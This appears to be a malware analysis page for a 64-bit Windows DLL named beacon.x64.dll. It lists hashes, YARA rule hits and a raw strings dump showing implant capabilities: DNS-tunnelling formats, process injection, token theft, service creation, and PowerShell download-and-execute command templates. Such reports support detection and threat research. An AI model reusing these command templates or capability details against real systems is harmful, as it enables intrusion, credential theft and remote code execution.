Sample details: 6069baa486d6230268803497cbe30f17 --

Hashes
MD5: 6069baa486d6230268803497cbe30f17
SHA1: 284c9b8bb59e982a882350041834e42f8de8e4c8
SHA256: a77e04ca5aff2385a50685535140355b9f15b23a02bd4484c15a157cf28b2af9
SSDEEP: 6144:TXt8VaLuxvxL4IaOT6tEm93WfwM31rOK+:TaVaLavxsIa3nGP311
Details
File Type: PE32+
Yara Hits
YRP/IsPE64 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/ThreadControl__Context | YRP/anti_dbg | YRP/inject_thread | YRP/create_service | YRP/network_http | YRP/network_dns | YRP/escalate_priv | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader | FlorianRoth/ReflectiveLoader | FlorianRoth/Beacon_K5om |
Strings
		MZARUH
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
t$ WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
x ATAVAWH
0A_A^A\
@SUVWAVAWH
XA_A^_^][
WATAUAVAWH
 A_A^A]A\_
WATAUAVAWH
|$(!D$ 
A_A^A]A\_
\$ UVWATAUAVAWH
A_A^A]A\_^]
x UATAUAVAWH
A_A^A]A\]
N,+~(I
WATAUAVAWH
 A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
0A_A^A]A\_
SUVWATAUAVAWH
HA_A^A]A\_^][
H SUVWH
` UAVAWH
@A_A^]
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
 A_A^A]A\_^]
|$ UATAUAVAWH
A_A^A]A\]
t$ UWAVH
<+t*<-t)
t$ WATAUAVAWH
u"9D$XH
 A_A^A]A\_
WAVAWH
 A_A^_
UAVAWH
9|$ t8L
UVWATAUAVAWH
A_A^A]A\_^]
9|$ t4L
WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
H SVWH
` UAVAWH
u 9D$8t
UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UAVAWH
UVWATAUAVAW
A_A^A]A\_^]
@USVWATAUAVAWH
L$0u%H
A_A^A]A\_^[]
@USVWATAUAVAWH
T$8u%H
A_A^A]A\_^[]
` UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
` UAVAWH
WATAUAVAWH
A_A^A]A\_
UAVAWH
D9t$P~
UAVAWH
@A_A^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
@SUVWATAUAVAWH
A_A^A]A\_^][
WATAUAVAWH
f;D$ w
f;D$"w
t$ WAVAWH
 A_A^_
WAVAWH
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
 A_A^_
WAVAWH
~8H!|$(H
@A_A^_
UVWAVAWH
A_A^_^]
UVWAVAWH
A_A^_^]
UVWATAUAVAWH
A_A^A]A\_^]
USVWATAUAVAWH
t$0D!l$(D
A_A^A]A\_^[]
t$ UWAVH
\$ UVWATAUAVAWH
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
` UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
l$ VWAVH
t$ UWAVH
L$8H!t$ L
@SUVWATAVAW
A_A^A\_^][
UATAUAVAWH
A_A^A]A\]
l$ VWAVH
;T$(}#C
x Hct$(E3
@SUVWATAVAWH
A_A^A\_^][
\$ UVWAVAWH
A_A^_^]
UVWATAUAVAWH
pA_A^A]A\_^]
UAVAWH
UATAUAVAWH
t=H;{`u7
A_A^A]A\]
WAVAWH
D$89D$@t
WAVAWH
@A_A^_
l$ VWAWH
system32L
\$ UVWH
\$ UVWAVAWH
A_A^_^]
t$ UWATAVAWH
A_A^A\_]
x ATAVAWH
fD9c8u
fD9{8u
 A_A^A\
uEf9o8u$H
b9\$0vX;
\$ UVWH
\$ UVWH
UVWATAVH
A^A\_^]
H !X H!X
UVWATAUAVAWH
`A_A^A]A\_^]
WAVAWH
 A_A^_
\$ UVWATAUAVAWH
A_A^A]A\_^]
l$ VWAVH
x UATAWH
\$ UVWH
UATAUAVAWH
A_A^A]A\]
@USVWATAUAVAWH
A_A^A]A\_^[]
|$ UAVAWH
uQHc}0I
\$ UVWAVAWH
A_A^_^]
x ATAVAWH
 A_A^A\
SUVWATAUAVAWH
z HcG<L
t)IcD$<A
I+w0E9
HA_A^A]A\_^][
UVWAVAWH
A_A^_^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
@USVWAVH
A^_^[]
@SUVWAVH
PA^_^][
t$ WAVAWH
HcL$ H
HcL$ H
HcL$ H
D$0HcD$$H
L$ USVWH
WATAUAVAWH
@A_A^A]A\_
fffffff
UAVAWH
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
|$ AVH
WATAUAVAWH
 A_A^A]A\_
L$ UVWATAUAVAWH
 A_A^A]A\_^]
t$ WATAUAVAW
A_A^A]A\_
A:8uiI
t"A88t
UVWATAUAVAWH
D$DD9T$\
|$h+t$D+
A_A^A]A\_^]
t$ WAVAWH
LcA<E3
ATAVAWH
 A_A^A\
WAVAWH
 A_A^_
VWATAVAWH
0A_A^A\_^
WATAUAVAWH
A_A^A]A\_
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
Genuua
ineIuY
nteluQ3
UVWATAUAVAWH
D$DD9T$\
|$h+t$D+
A_A^A]A\_^]
WAVAWH
 A_A^_
VWATAVAWH
A_A^A\_^
AUAVAWH
0A_A^A]
VWAUAVAWH
0A_A^A]_^
VWATAVAWH
 A_A^A\_^
\$ UVWATAUAVAWH
!|$HHc
|$HD9l$X
HcD$LH;
HcD$LH;
H!|$ L
A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
8UXt#D
XA_A^A]A\_^[]
VWATAVAWH
 A_A^A\_^
VWATAVAWH
 A_A^A\_^
` AUAVAWH
t$8Hc0I
\$0D9=
A_A^A]
Hct$@H
sYHcL$HH
x ATAVAWH
< tD<	t@
 A_A^A\
H3E H3E
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
tcH95N2
PA_A^A\_^][
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
@UATAUAVAWH
A_A^A]A\]
` AUAVAWH
0A_A^A]
D$(A9h
@8l$8t
r"fD;A
@8l$8t
D82u&H
D8t$Ht
UAVAWH
fD9|T@
C\f9DL@t
USVWATAUAVAWH
u@H9=Q
t]+uoA;6rUA
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
 A_A^A]
UVWATAVH
0A^A\_^]
UVWATAUAVAWH
0A_A^A]A\_^]
D9d$xttH
UVWATAUAVAWH
L$purL
0A_A^A]A\_^]
D9t$xtpH
@8t$8t
@8l$Ht
fD93tSH
CfD93u
@USVWATAUAVAWH
eHA_A^A]A\_^[]
HcD$hH
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
Could not open process token: %d (%u)
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
127.0.0.1
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Started service %s on %s
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
IsWow64Process
kernel32
Could not open '%s'
copy failed: %d
move failed: %d
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not adjust permissions in process: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
sysnative
Could not set PPID to %d: %d
Could not set PPID to %d
RtlCreateUserThread
ntdll.dll
process
Could not connect to pipe: %d
%d	%d	%s
Kerberos
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
%d	%d	%d.%d	%s	%s	%s	%d	%d
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
?%s=%s
%s&%s=%s
%s%s: %s
Could not kill %d: %d
%s	%d	%d
%s	%d	%d	%s	%s	%d
hmac_calculate
decrypt/cbc_start
decrypt/cbc_decrypt
decrypt/cbc_done
encrypt/cbc_start
encrypt/cbc_encrypt
encrypt/cbc_done
crypt_derive
abcdefghijklmnop
aes_setup
rsa_import
rsa_encrypt
could not create pipe: %d
I'm already in SMB mode
%s (admin)
Could not open process: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
,cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
}}}}cc
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
"3DUfw
"3DUfw
"3DUfw
CorExitProcess
(null)
`h````
xpxxxx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
`h`hhh
xppwpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UNICODE
UTF-16LE
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
Stack memory was corrupted
A local variable was used before it was initialized
Stack memory around _alloca was corrupted
Unknown Runtime Check Error
Unknown Filename
Unknown Module Name
Run-Time Check Failure #%d - %s
Stack corrupted near unknown variable
Stack pointer corruption
Cast to smaller type causing loss of data
Stack memory corruption
Local variable used before initialization
Stack around _alloca corrupted
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
RegOpenKeyExW
RegQueryValueExW
RegCloseKey
PDBOpenValidate5
CreateFile2
Microsoft Base Cryptographic Provider v1.0
?456789:;<=
 !"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
sha256
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
GetCurrentProcessId
GetLocalTime
GetTickCount
OpenProcess
GetLastError
WaitForSingleObject
WriteFile
FlushFileBuffers
GetFileTime
SetFileTime
CloseHandle
CreatePipe
DisconnectNamedPipe
CreateProcessA
GetStartupInfoA
GetEnvironmentVariableA
SetCurrentDirectoryA
GetCurrentDirectoryA
GetCurrentDirectoryW
CreateFileA
GetProcAddress
GetCurrentProcess
CreateThread
GetCurrentThread
ReadFile
ConnectNamedPipe
GetModuleHandleA
CreateNamedPipeA
GetVersionExA
GetFullPathNameA
GetLogicalDrives
FindClose
SystemTimeToTzSpecificLocalTime
FileTimeToSystemTime
ExpandEnvironmentStringsA
GetFileAttributesA
FindFirstFileA
FindNextFileA
CopyFileA
MoveFileA
VirtualAlloc
VirtualProtect
VirtualAllocEx
VirtualProtectEx
HeapAlloc
HeapFree
GetProcessHeap
CreateRemoteThread
WriteProcessMemory
DuplicateHandle
InitializeProcThreadAttributeList
DeleteProcThreadAttributeList
UpdateProcThreadAttribute
ProcessIdToSessionId
FreeLibrary
SetLastError
GetThreadContext
SetThreadContext
Wow64GetThreadContext
Wow64SetThreadContext
ResumeThread
CreateToolhelp32Snapshot
SetNamedPipeHandleState
PeekNamedPipe
WaitNamedPipeA
LocalAlloc
LocalFree
GetComputerNameA
TerminateProcess
Process32First
Process32Next
KERNEL32.dll
OpenProcessToken
CreateProcessAsUserA
CreateProcessWithLogonW
CreateProcessWithTokenW
CloseServiceHandle
CreateServiceA
DeleteService
OpenSCManagerA
QueryServiceStatus
StartServiceA
ImpersonateNamedPipeClient
OpenThreadToken
AdjustTokenPrivileges
LookupPrivilegeValueA
ImpersonateLoggedOnUser
ControlService
OpenServiceA
QueryServiceStatusEx
GetUserNameA
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
RevertToSelf
GetTokenInformation
AllocateAndInitializeSid
FreeSid
LookupAccountSidA
LogonUserA
DuplicateTokenEx
CheckTokenMembership
ADVAPI32.dll
InternetOpenA
InternetCloseHandle
InternetConnectA
InternetReadFile
InternetQueryDataAvailable
InternetQueryOptionA
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
WS2_32.dll
DnsFree
DnsQuery_A
DNSAPI.dll
GetIfEntry
GetIpAddrTable
IPHLPAPI.DLL
LsaLookupAuthenticationPackage
LsaCallAuthenticationPackage
LsaConnectUntrusted
Secur32.dll
EncodePointer
DecodePointer
ExitProcess
GetModuleHandleExW
AreFileApisANSI
MultiByteToWideChar
IsDebuggerPresent
IsProcessorFeaturePresent
GetCommandLineA
GetCurrentThreadId
GetSystemTimeAsFileTime
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetStartupInfoW
GetModuleHandleW
GetStdHandle
GetModuleFileNameW
LoadLibraryExW
RtlUnwindEx
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
ReadConsoleW
SetFilePointer
SetFilePointerEx
GetFileType
DeleteFileW
CreateDirectoryW
RemoveDirectoryW
GetModuleFileNameA
QueryPerformanceCounter
GetEnvironmentStringsW
FreeEnvironmentStringsW
RaiseException
LoadLibraryW
OutputDebugStringW
HeapSize
HeapReAlloc
CompareStringW
LCMapStringW
GetStringTypeW
SetStdHandle
WriteConsoleW
VirtualQuery
CreateFileW
SetEndOfFile
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
SetEnvironmentVariableA
SetEnvironmentVariableW
beacon.x64.dll
ReflectiveLoader
D$$[[aYZQ
6QQh8h
AQAPRQVH1
AXAX^YZAXAYAZH
ihihikiiikihikv
ijikimii
	imikimiyiiilihikiiioihiki
inijhiY
dhhhlij
dkjhihiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiaijhiXXXG[ZYGP[G[]XEF
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii`iji
F\GYIA
RI$: ,IXYGYRI>
I'=I_G[RI=
F_GYRI=
@iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiciji)F
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibijhiiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiieijhiiiiniiiiiiijiiioiiio*
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiidijhiiiiciiiO*
iiiniiiiiiiliiik
iiiniiihiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiitiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiwiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiifiji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivihikihizikimiiiii}ikimiiiiisijiy.,=iiiiiiiiiiiiiirijiy9&:=iiiiiiiiiiiiiuikimiiiiiJihikikiyihikiiixihikiii{ihikiiiMihikijii
rijndael
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>